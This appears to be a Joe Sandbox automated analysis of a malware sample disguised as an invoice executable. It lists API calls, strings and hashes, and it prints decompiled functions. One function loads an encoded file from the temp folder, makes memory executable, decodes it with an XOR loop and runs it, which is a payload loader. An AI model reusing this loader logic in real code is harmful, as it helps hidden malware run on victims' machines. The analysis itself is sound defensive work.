0x004015fb
0x004015f0
0x00401600
0x00401603
0x00401605
0x00401606
0x004015c8
0x0040160d
0x0040162d
0x00402156
0x0040160f
0x00401611
0x0040161c
0x00401622
0x00401622
0x00402880
0x0040288c

APIs

Part of subcall function 0040560C: CharNextA.USER32(004053BE,?,004218A0,00000000,00405670,004218A0,004218A0,?,?,74E5F560,004053BE,?,"C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe" ,74E5F560), ref: 0040561A
Part of subcall function 0040560C: CharNextA.USER32(00000000), ref: 0040561F
Part of subcall function 0040560C: CharNextA.USER32(00000000), ref: 0040562E

CreateDirectoryA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015DB
GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015E5
GetFileAttributesA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015F3
SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 00401622

Strings

C:\Users\user\AppData\Local\Temp, xrefs: 00401617

Memory Dump Source

Source File: 00000000.00000002.295549873.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.295519820.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295621843.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295638636.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295788784.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295800673.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295840068.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295878649.000000000042E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296115912.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_G2M8C76V_INV0ICE_RECEIPT.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
String ID: C:\Users\user\AppData\Local\Temp
API String ID: 3751793516-501415292
Opcode ID: b22028777b76ff0adb18f2892ab6001a383c6b987e8d30e1b3724520259a3699
Instruction ID: 11ba4fe5436512bc7837d50811c3794abd92905400bb47a2e3f09ad75438aea6
Opcode Fuzzy Hash: b22028777b76ff0adb18f2892ab6001a383c6b987e8d30e1b3724520259a3699
Instruction Fuzzy Hash: B3010431908150AFDB116FB51D44D7F67B0AA56365768073BF491B22E2C63C4942D62E

Uniqueness

Uniqueness Score: -1.00%

Function 0040578B, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 32
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0040578B(char _a4, intOrPtr _a6, CHAR* _a8) {
				signed int _t11;
				int _t14;
				signed int _t16;
				void* _t19;
				CHAR* _t20;

				_t20 = _a4;
				_t19 = 0x64;
				while(1) {
					_t19 = _t19 - 1;
					_a4 = 0x61736e;
					_t11 = GetTickCount();
					_t16 = 0x1a;
					_a6 = _a6 + _t11 % _t16;
					_t14 = GetTempFileNameA(_a8,  &_a4, 0, _t20); // executed
					if(_t14 != 0) {
						break;
					}
					if(_t19 != 0) {
						continue;
					}
					 *_t20 =  *_t20 & 0x00000000;
					return _t14;
				}
				return _t20;
			}

0x0040578f
0x00405795
0x00405796
0x00405796
0x00405797
0x0040579e
0x004057a8
0x004057b5
0x004057b8
0x004057c0
0x00000000
0x00000000
0x004057c4
0x00000000
0x00000000
0x004057c6
0x00000000
0x004057c6
0x00000000

APIs

GetTickCount.KERNEL32 ref: 0040579E
GetTempFileNameA.KERNELBASE(?,0061736E,00000000,?), ref: 004057B8

Strings

"C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe" , xrefs: 00405792
nsa, xrefs: 00405797
C:\Users\user\AppData\Local\Temp\, xrefs: 0040578B, 0040578E

Memory Dump Source

Source File: 00000000.00000002.295549873.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.295519820.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295621843.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295638636.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295788784.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295800673.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295840068.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295878649.000000000042E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296115912.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_G2M8C76V_INV0ICE_RECEIPT.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: "C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe" $C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-178574222
Opcode ID: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
Instruction ID: 4fcdc00fff711095840056c8ed2a58f2bfde19b521d5dac465ae6a1bf3f6778c
Opcode Fuzzy Hash: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
Instruction Fuzzy Hash: F9F0A736348304B6D7104E55DC04B9B7F69DF91750F14C02BFA449B1C0D6B0995497A5

Uniqueness

Uniqueness Score: -1.00%

Function 738D10A0, Relevance: 6.1, APIs: 4, Instructions: 88
filememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 76%

			E738D10A0(void* __ecx, void* __eflags) {
				short _v6;
				short _v8;
				short _v10;
				short _v12;
				short _v14;
				short _v16;
				short _v18;
				char _v20;
				void* _v24;
				long _v28;
				long _v32;
				short _v1072;
				void _v8520;
				void* _t34;
				intOrPtr _t37;
				struct _OVERLAPPED* _t65;
				void* _t73;

				E738D1000(0x2144, __ecx);
				_v20 = 0x6e;
				_v18 = 0x66;
				_v16 = 0x6a;
				_v14 = 0x76;
				_v12 = 0x68;
				_v10 = 0x6c;
				_v8 = 0x63;
				_v6 = 0;
				GetTempPathW(0x103,  &_v1072);
				E738D1030( &_v1072,  &_v20);
				VirtualProtect( &_v8520, 0x1d18, 0x40,  &_v28); // executed
				_t34 = CreateFileW( &_v1072, 0x80000000, 7, 0, 3, 0x80, 0); // executed
				_v24 = _t34;
				ReadFile(_v24,  &_v8520, 0x1d18,  &_v32, 0); // executed
				_t65 = 0;
				while(1) {
					_t37 =  *((intOrPtr*)(_t73 + _t65 - 0x2144));
					if(_t65 == 0x1d18) {
						break;
					}
					 *((char*)(_t73 + _t65 - 0x2144)) = ((_t37 + 0x00000001 - 0x0000005a + 0x00000001 - 0x49 ^ 0x0000001f) + 0x00000001 - 0x00000001 ^ 0x000000f8) + 1 - 1 + 1 - 0x7c + 1 - 0xffffffffffffffef + 0xf7;
					_t65 =  &(_t65->Internal);
				}
				_v8520();
				return 0;
			}

0x738d10a8
0x738d10b2
0x738d10bb
0x738d10c4
0x738d10cd
0x738d10d6
0x738d10df
0x738d10e8
0x738d10ee
0x738d10fe
0x738d110f
0x738d1129
0x738d1148
0x738d114e
0x738d1167
0x738d116d
0x738d1172
0x738d1172
0x738d117f
0x00000000
0x00000000
0x738d11a3
0x738d11aa
0x738d11aa
0x738d11bc
0x738d11c3

APIs

GetTempPathW.KERNEL32(00000103,?), ref: 738D10FE
VirtualProtect.KERNELBASE(?,00001D18,00000040,?), ref: 738D1129
CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 738D1148
ReadFile.KERNELBASE(00001D18,?,00001D18,?,00000000), ref: 738D1167

Memory Dump Source

Source File: 00000000.00000002.297319678.00000000738D1000.00000020.00020000.sdmp, Offset: 738D0000, based on PE: true

Associated: 00000000.00000002.297311790.00000000738D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.297328471.00000000738D2000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_738d0000_G2M8C76V_INV0ICE_RECEIPT.jbxd

Similarity

API ID: File$CreatePathProtectReadTempVirtual
String ID:
API String ID: 205760209-0
Opcode ID: b8d36d18e7d5e5fce5d79d620629017952396bb56c5262c3dcbc77148349cdbe
Instruction ID: 42ebdf4389987ac101ee1a45abc3d2648200719842bbb490a5de5a3c66589df8
Opcode Fuzzy Hash: b8d36d18e7d5e5fce5d79d620629017952396bb56c5262c3dcbc77148349cdbe
Instruction Fuzzy Hash: 2C31D831A10208A7FB14DBB0D916BEE7736EF58700F10945CE709EB2C0E7755A06C769

Uniqueness

Uniqueness Score: -1.00%

Function 004031F1, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 84%

			E004031F1(void* __eflags) {
				void* _t2;
				void* _t5;
				CHAR* _t6;

				_t6 = "C:\\Users\\hardz\\AppData\\Local\\Temp\\";
				E00405CE3(_t6);
				_t2 = E004055E5(_t6);
				if(_t2 != 0) {
					E00405578(_t6);
					CreateDirectoryA(_t6, 0); // executed
					_t5 = E0040578B("1033", _t6); // executed
					return _t5;
				} else {
					return _t2;
				}
			}

0x004031f2
0x004031f8
0x004031fe
0x00403205
0x0040320a
0x00403212
0x0040321e
0x00403224
0x00403208
0x00403208
0x00403208

APIs

Part of subcall function 00405CE3: CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D3B
Part of subcall function 00405CE3: CharNextA.USER32(?,?,?,00000000), ref: 00405D48
Part of subcall function 00405CE3: CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D4D
Part of subcall function 00405CE3: CharPrevA.USER32(?,?,"C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D5D

CreateDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00403212

Strings

1033, xrefs: 00403219
C:\Users\user\AppData\Local\Temp\, xrefs: 004031F2, 004031F7, 004031FD, 00403209, 00403211, 00403218

Memory Dump Source

Source File: 00000000.00000002.295549873.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.295519820.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295621843.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295638636.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295788784.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295800673.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295840068.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295878649.000000000042E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296115912.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_G2M8C76V_INV0ICE_RECEIPT.jbxd

Similarity

API ID: Char$Next$CreateDirectoryPrev
String ID: 1033$C:\Users\user\AppData\Local\Temp\
API String ID: 4115351271-1075807775
Opcode ID: 048fde499a06d2c9d784819047d513c4ac368109c0a7a4f8390a920d62fbeaed
Instruction ID: 52f5018bb87fe832e559484150a565c10a299960058697363e648776ae6da385
Opcode Fuzzy Hash: 048fde499a06d2c9d784819047d513c4ac368109c0a7a4f8390a920d62fbeaed
Instruction Fuzzy Hash: 68D0C92164AD3036D551372A3D0AFDF090D9F4272EF21417BF804B50CA5B6C6A8319EF

Uniqueness

Uniqueness Score: -1.00%

Function 00406481, Relevance: 5.2, APIs: 4, Instructions: 236
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 99%

			E00406481() {
				signed int _t530;
				void _t537;
				signed int _t538;
				signed int _t539;
				unsigned short _t569;
				signed int _t579;
				signed int _t607;
				void* _t627;
				signed int _t628;
				signed int _t635;
				signed int* _t643;
				void* _t644;

				L0:
				while(1) {
					L0:
					_t530 =  *(_t644 - 0x30);
					if(_t530 >= 4) {
					}
					 *(_t644 - 0x40) = 6;
					 *(_t644 - 0x7c) = 0x19;
					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
					while(1) {
						L145:
						 *(_t644 - 0x50) = 1;
						 *(_t644 - 0x48) =  *(_t644 - 0x40);
						while(1) {
							L149:
							if( *(_t644 - 0x48) <= 0) {
								goto L155;
							}
							L150:
							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
							 *(_t644 - 0x54) = _t643;
							_t569 =  *_t643;
							_t635 = _t569 & 0x0000ffff;
							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
							if( *(_t644 - 0xc) >= _t607) {
								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
								_t628 = _t627 + 1;
								 *_t643 = _t569 - (_t569 >> 5);
								 *(_t644 - 0x50) = _t628;
							} else {
								 *(_t644 - 0x10) = _t607;
								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
								 *_t643 = (0x800 - _t635 >> 5) + _t569;
							}
							if( *(_t644 - 0x10) >= 0x1000000) {
								L148:
								_t487 = _t644 - 0x48;
								 *_t487 =  *(_t644 - 0x48) - 1;
								L149:
								if( *(_t644 - 0x48) <= 0) {
									goto L155;
								}
								goto L150;
							} else {
								L154:
								L146:
								if( *(_t644 - 0x6c) == 0) {
									L169:
									 *(_t644 - 0x88) = 0x18;
									L170:
									_t579 = 0x22;
									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
									_t539 = 0;
									L172:
									return _t539;
								}
								L147:
								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
								_t484 = _t644 - 0x70;
								 *_t484 =  &(( *(_t644 - 0x70))[1]);
								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
								goto L148;
							}
							L155:
							_t537 =  *(_t644 - 0x7c);
							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
							while(1) {
								L140:
								 *(_t644 - 0x88) = _t537;
								while(1) {
									L1:
									_t538 =  *(_t644 - 0x88);
									if(_t538 > 0x1c) {
										break;
									}
									L2:
									switch( *((intOrPtr*)(_t538 * 4 +  &M004068EF))) {
										case 0:
											L3:
											if( *(_t644 - 0x6c) == 0) {
												goto L170;
											}
											L4:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t538 =  *( *(_t644 - 0x70));
											if(_t538 > 0xe1) {
												goto L171;
											}
											L5:
											_t542 = _t538 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t581);
											_push(9);
											_pop(_t582);
											_t638 = _t542 / _t581;
											_t544 = _t542 % _t581 & 0x000000ff;
											asm("cdq");
											_t633 = _t544 % _t582 & 0x000000ff;
											 *(_t644 - 0x3c) = _t633;
											 *(_t644 - 0x1c) = (1 << _t638) - 1;
											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
											_t641 = (0x300 << _t633 + _t638) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
												L10:
												if(_t641 == 0) {
													L12:
													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t641 = _t641 - 1;
													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
												} while (_t641 != 0);
												goto L12;
											}
											L6:
											if( *(_t644 - 4) != 0) {
												GlobalFree( *(_t644 - 4));
											}
											_t538 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t644 - 4) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L157:
												 *(_t644 - 0x88) = 1;
												goto L170;
											}
											L14:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t45 = _t644 - 0x48;
											 *_t45 =  *(_t644 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t644 - 0x48) < 4) {
												goto L13;
											}
											L16:
											_t550 =  *(_t644 - 0x40);
											if(_t550 ==  *(_t644 - 0x74)) {
												L20:
												 *(_t644 - 0x48) = 5;
												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											L17:
											 *(_t644 - 0x74) = _t550;
											if( *(_t644 - 8) != 0) {
												GlobalFree( *(_t644 - 8));
											}
											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
											 *(_t644 - 8) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
											 *(_t644 - 0x84) = 6;
											 *(_t644 - 0x4c) = _t557;
											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L158:
												 *(_t644 - 0x88) = 3;
												goto L170;
											}
											L22:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											_t67 = _t644 - 0x70;
											 *_t67 =  &(( *(_t644 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L23:
											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
											if( *(_t644 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t559 =  *_t642;
											_t626 = _t559 & 0x0000ffff;
											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
											if( *(_t644 - 0xc) >= _t596) {
												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
												 *(_t644 - 0x40) = 1;
												_t560 = _t559 - (_t559 >> 5);
												__eflags = _t560;
												 *_t642 = _t560;
											} else {
												 *(_t644 - 0x10) = _t596;
												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
												 *_t642 = (0x800 - _t626 >> 5) + _t559;
											}
											if( *(_t644 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t644 - 0x6c) == 0) {
												L168:
												 *(_t644 - 0x88) = 5;
												goto L170;
											}
											L138:
											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L139:
											_t537 =  *(_t644 - 0x84);
											L140:
											 *(_t644 - 0x88) = _t537;
											goto L1;
										case 6:
											L25:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L36:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L26:
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												L35:
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												L32:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											L66:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												L68:
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											L67:
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											L70:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											L73:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											L74:
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											L75:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											L82:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L84:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L83:
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											L85:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L164:
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											L100:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L159:
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											L38:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											L40:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
